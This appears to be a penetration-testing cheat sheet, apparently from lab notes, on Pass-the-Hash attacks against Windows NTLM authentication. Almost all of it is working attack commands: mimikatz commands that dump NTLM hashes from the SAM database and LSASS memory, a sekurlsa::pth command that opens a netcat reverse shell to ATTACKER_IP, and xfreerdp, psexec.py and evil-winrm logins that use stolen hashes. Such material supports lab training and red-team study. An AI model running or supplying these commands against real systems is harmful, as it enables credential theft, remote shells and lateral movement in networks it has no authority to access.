Passing the Hash (PtH)

NTLM

Extracting NTLM Hashes

  1. From the Local SAM Database

    • Commands:

      mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

  2. From LSASS Memory

    • Commands:

      mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::msv

Using Extracted Hashes

  1. Reverting Privileges Before Use

    • Command:

      mimikatz # token::revert

  2. Exploiting With PtH

    • Example Command:

      mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

Passing the Hash Using Linux

  1. Connect to RDP Using PtH

    • Command:

      xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

  2. Connect via PsExec Using PtH

    • Command:

      psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP

    • Note: Only the Linux version of psexec supports PtH.

  3. Connect to WinRM Using PtH

    • Command:

      evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

PreviousKerberosNextRemote process

Last updated